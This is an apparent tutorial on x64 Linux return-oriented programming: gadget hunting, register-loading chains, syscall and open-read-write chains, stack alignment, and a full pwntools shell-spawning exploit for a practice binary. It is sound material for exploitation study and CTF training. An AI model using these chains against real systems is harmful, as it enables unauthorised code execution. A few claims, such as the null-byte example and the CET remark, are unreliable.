x64 ROP Chains: Systematic Gadget Hunting
Building ROP chains on x64 Linux - finding gadgets with ropper, handling calling conventions, chaining syscalls, dealing with bad characters, stack alignment, and a complete worked example.
Why x64 ROP Is Different from x86 ROP
Three things change everything when moving from 32-bit to 64-bit ROP:
- Register-based calling convention: x86 cdecl pushed every argument on the stack, so a chain that called
system("/bin/sh")was mechanically[ret_addr_of_system, junk_return, &"/bin/sh"]. On x64 the first six arguments live in registers, so the chain has to load registers first. - Address space size: every gadget address is now 8 bytes, half of which are usually
\x00. If your overflow usesstrcpy/strcat/sprintf(anything null-terminated), addresses end-with-null are unusable mid-chain. - Stack alignment: the System V ABI mandates 16-byte RSP alignment immediately before a
callinstruction. SSE-using libc functions (printf,system) crash onmovapsif you violate this.
This post is a systematic walkthrough of how to build chains that survive all three.
x64 Calling Convention
On Linux x64, the first 6 arguments go in registers: rdi, rsi, rdx, rcx, r8, r9. A ROP chain must load these registers via pop; ret gadgets before calling the target function.
| Argument | Register | Typical use |
|---|---|---|
| 1 | rdi |
first pointer/value |
| 2 | rsi |
second pointer/value |
| 3 | rdx |
third pointer/value (also read/write count) |
| 4 | rcx |
fourth pointer/value (note: syscalls clobber rcx - use r10 for syscall arg 4 instead) |
| 5 | r8 |
fifth pointer/value |
| 6 | r9 |
sixth pointer/value |
Return value lands in rax. Floating-point arguments use xmm0..xmm7 (rare in exploit work). For variadic functions like printf, rax must contain the count of XMM registers used (typically 0 for plain ROP).
Why Registers Make Life Harder
For system("/bin/sh") you need exactly one register (rdi) loaded with a pointer to /bin/sh. For execve("/bin/sh", argv, envp) via syscall you need four registers, plus rax = 59, plus r10 = rcx_clone. Each register requires a pop reg; ret gadget - and the wider you go, the harder it is to find clean ones.
Finding Gadgets
ropper --file vuln --search "pop rdi"
ropper --file vuln --search "pop rsi; pop r15"
ropper --file vuln --search "ret" # for stack alignment
ropper and ROPgadget are the two standards. Both walk the executable sections, scan backwards from every ret/jmp reg/call reg for any byte sequence that decodes as valid x64 instructions, and emit a list. Use either; pwntools’ ROP() class wraps both internally.
Useful Search Patterns
# Direct register loaders
ropper -f vuln --search 'pop rdi; ret'
ropper -f vuln --search 'pop rsi; ret'
ropper -f vuln --search 'pop rdx; ret'
# Two-register / multi-register variants when single ones don't exist
ropper -f vuln --search 'pop rsi; pop r15; ret' # very common
ropper -f vuln --search 'pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret'
# Syscall / direct syscall
ropper -f vuln --search 'syscall'
ropper -f vuln --search 'syscall; ret'
# Memory-write primitives
ropper -f vuln --search 'mov qword ptr [rdi], rsi; ret' # arbitrary 8-byte write
ropper -f vuln --search 'xchg rax, rsp' # stack pivot
# Alignment
ropper -f vuln --search 'ret' # any clean ret
# Static binaries - search libc bundled into the ELF
ROPgadget --binary vuln | grep ': pop rdx'
Where to Search When the Binary Is Sparse
Small statically-stripped binaries sometimes have no pop rdx; ret at all. Sources of additional gadgets:
| Source | When available |
|---|---|
libc.so.6 (after libc leak) |
Dynamic binary, libc gadgets after stage-1 leak |
ld-linux-x86-64.so.2 |
Always loaded; small but contains a few useful pop-r* / syscall gadgets |
vsyscall page (0xffffffffff600000) |
Only on older kernels; contains a few fixed syscall entry points |
| Existing functions used “in the middle” | A function epilogue (add rsp, X; pop r12; pop r13; pop rbp; ret) often serves as a multi-pop gadget |
__libc_csu_init (pre-glibc-2.34) |
The Universal-Gadget - a 6-pop epilogue that lets you load r12-r15 + rbp + rbx in one shot |
The “csu_init Universal Gadget”
In binaries linked against glibc < 2.34, __libc_csu_init ends with a stylised epilogue that ROP chains love:
__libc_csu_init+90: pop rbx
__libc_csu_init+91: pop rbp
__libc_csu_init+92: pop r12
__libc_csu_init+94: pop r13
__libc_csu_init+96: pop r14
__libc_csu_init+98: pop r15
__libc_csu_init+100: ret
__libc_csu_init+74: mov rdx, r15
__libc_csu_init+77: mov rsi, r14
__libc_csu_init+80: mov edi, r13d
__libc_csu_init+83: call qword ptr [r12 + rbx*8]
A two-stage chain: first hit +90 to load all six registers; then jump to +74 to move them into rdx, rsi, edi and call [r12+rbx*8]. This solves the “no pop rdx; ret exists” problem on most pre-2.34 binaries.
In glibc 2.34+, __libc_csu_init has been removed (the init code is part of _start instead) - search elsewhere.
Common x64 ROP Pattern
rop = b""
rop += p64(pop_rdi) # pop rdi; ret
rop += p64(bin_sh_addr) # "/bin/sh" string address
rop += p64(ret) # stack alignment (16-byte)
rop += p64(system_addr) # system()
This is the canonical “you have a libc leak” payload. The ret between the argument loader and the call to system exists for one purpose only - adding 8 bytes to RSP so that by the time system’s prologue executes its movaps, RSP is 16-aligned.
When You Need More Than Three Lines
A real chain is rarely this clean. Practical considerations:
rop = p64(pop_rdi) + p64(elf.got['puts']) # arg1 = puts@got
rop += p64(plt_puts) # call puts(puts@got) → leak libc
rop += p64(elf.symbols['main']) # return to main, restart with libc base known
# After receiving the leak, build chain 2 with libc.address resolved
rop2 = p64(pop_rdi) + p64(libc_binsh)
rop2 += p64(ret_align)
rop2 += p64(libc.symbols['system'])
Syscall ROP Chain
For a direct execve syscall:
rop = p64(pop_rax) + p64(59) # syscall number for execve
rop += p64(pop_rdi) + p64(bin_sh) # filename = "/bin/sh"
rop += p64(pop_rsi) + p64(0) # argv = NULL
rop += p64(pop_rdx) + p64(0) # envp = NULL
rop += p64(syscall_ret) # syscall; ret
Linux x64 Syscall ABI (vs. function call)
This catches people every time. Function calls use rcx for arg 4. Syscalls use r10 for arg 4 because syscall itself clobbers rcx (the kernel writes rip+2 into rcx for sysret). The common syscalls and their numbers:
| # | Name | Args |
|---|---|---|
| 0 | read |
rdi=fd, rsi=buf, rdx=count |
| 1 | write |
rdi=fd, rsi=buf, rdx=count |
| 2 | open |
rdi=pathname, rsi=flags, rdx=mode |
| 10 | mprotect |
rdi=addr, rsi=len, rdx=prot |
| 59 | execve |
rdi=pathname, rsi=argv, rdx=envp |
When system Is Off-Limits
Sandboxed CTF binaries frequently seccomp away execve (and fork, clone, etc.), forcing an “open-read-write” chain (ORW):
rop = p64(pop_rdi) + p64(flag_path)
rop += p64(pop_rsi) + p64(0) # O_RDONLY
rop += p64(pop_rax) + p64(2) # SYS_open
rop += p64(syscall_ret) # rax = fd
rop += p64(pop_rdi) + p64(3) # fd (assume 3)
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(0) # SYS_read
rop += p64(syscall_ret)
rop += p64(pop_rdi) + p64(1) # stdout
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(1) # SYS_write
rop += p64(syscall_ret)
Stack Alignment
System V ABI requires 16-byte stack alignment before call. If your chain crashes in system() or printf(), insert an extra ret gadget.
Diagnosing the Crash
The fingerprint of a stack-alignment crash is unmistakable:
gdb-peda$ x/i $rip
=> 0x7f9...: movaps XMMWORD PTR [rsp+0x50], xmm0
gdb-peda$ p/x $rsp & 0xf
$1 = 0x8 ← off by 8, classic alignment bug
movaps and movdqa require 16-byte aligned operands; an unaligned access raises SIGSEGV. The fix is to ensure RSP & 0xf == 0 immediately before the call, which means immediately after the previous ret, RSP must be 0x...8 (the ret itself pops 8 bytes).
The 8-Byte Rule
After every ret in your chain, RSP advances by 8. If your initial overflow leaves RSP at a known offset, count ret instructions:
- Even number of pops between calls → alignment preserved.
- Odd number → off by 8, insert a single
retgadget to fix.
In practice, a single bare ret between the last argument-loader and the function call solves 99% of crashes.
Dealing with Bad Characters
If certain bytes (like \x00 or \x0a) are filtered, find alternate gadgets or use add/sub gadget chains to construct addresses without bad bytes.
Common Bad Character Sets
| Source of overflow | Likely banned bytes |
|---|---|
gets, fgets |
\x0a (newline) |
read from network |
usually none, full 8-bit clean |
strcpy, strcat |
\x00 |
scanf("%s", ...) |
whitespace: \x09 \x0a \x0b \x0c \x0d \x20 |
recv followed by strncpy |
\x00 |
Any address ending in \x00 (very common, since the upper bytes of x64 user addresses are \x00\x00) is unusable mid-chain when null-bytes are forbidden - except as the last 8 bytes of the payload.
Building Bad-Byte-Free Addresses
If you need address 0x401234 but \x00 is banned, two tactics:
-
Compute via arithmetic gadgets:
rop = p64(pop_rax) + p64(0x10000000401234) # contains 0x00 in the middle? no rop += p64(sub_rax_const) rop += p64(0x10000000000000) # subtract to get target rop += p64(jmp_rax) -
sprintf("%s", payload)-style: send the payload past the bad characters and use a gadget to copy it into a clean writable region (.bss, heap), then pivot the stack into the new region (xchg rsp, rax).
Bad Bytes Inside Libc Addresses
After ASLR, libc base typically has the form 0x7f???????????? - the leading 0x7f is rarely a problem, but \x00 mid-chain stays a problem. Same arithmetic-gadget tricks apply, with the leak from stage 1 already in rax.
Worked Example: Tying It All Together
from pwn import *
elf = ELF('./vuln')
libc = ELF('./libc.so.6')
io = process('./vuln')
# ---- Gadgets in the binary ----
pop_rdi = next(elf.search(asm('pop rdi; ret'), executable=True))
ret_g = next(elf.search(asm('ret'), executable=True))
# ---- Stage 1: leak libc through puts ----
chain1 = b'A' * 0x40 + b'B' * 8 # buffer + saved RBP
chain1 += p64(pop_rdi) + p64(elf.got['puts'])
chain1 += p64(elf.plt['puts'])
chain1 += p64(elf.symbols['main'])
io.sendlineafter(b'> ', chain1)
leak = u64(io.recv(6).ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f'libc base = {hex(libc.address)}')
# ---- Stage 2: execve("/bin/sh", 0, 0) via direct syscall ----
pop_rax = libc.address + 0x000000000003a738 # pop rax; ret
pop_rsi = libc.address + 0x000000000002601f # pop rsi; ret
pop_rdx = libc.address + 0x0000000000142c92 # pop rdx; ret
syscall_ret = libc.address + 0x0000000000091316 # syscall; ret
binsh = next(libc.search(b'/bin/sh\x00'))
chain2 = b'A' * 0x40 + b'B' * 8
chain2 += p64(pop_rax) + p64(0x3b) # SYS_execve
chain2 += p64(pop_rdi) + p64(binsh)
chain2 += p64(pop_rsi) + p64(0)
chain2 += p64(pop_rdx) + p64(0)
chain2 += p64(ret_g) # alignment
chain2 += p64(syscall_ret)
io.sendlineafter(b'> ', chain2)
io.interactive()
A Few More Tactics Worth Knowing
- SROP (Sigreturn-Oriented Programming): forge a
sigcontexton the stack, return to asigreturnsyscall. One gadget loads all registers at once. Useful when conventionalpop reg; retgadgets are scarce. - JOP/COP: when
retinstructions are restricted (rare on Linux, common in some embedded/Windows-CFG-protected binaries), usejmp [reg]orcall [reg]chains instead. mprotect+ shellcode: allocate execution permission on a writable region, copy shellcode, jump to it. Lets you escape ROP entirely once you have the primitive.- Stack pivot:
xchg rsp, rax,mov rsp, rbp; pop rbp; ret,leave; ret- pivot RSP into a controlled region (e.g..bss, the heap, or anywhere your input was copied). - CET / Shadow Stack mitigations: Intel CET enforces a parallel shadow stack - every
retchecks the saved return address against the shadow copy. Pure ROP fails. SROP, JOP, COP all break CET; future-proof chains favour these.
Master the x64 calling convention and you can build a ROP chain for any binary. The rest is just finding the right gadgets - and the discipline to keep RSP aligned.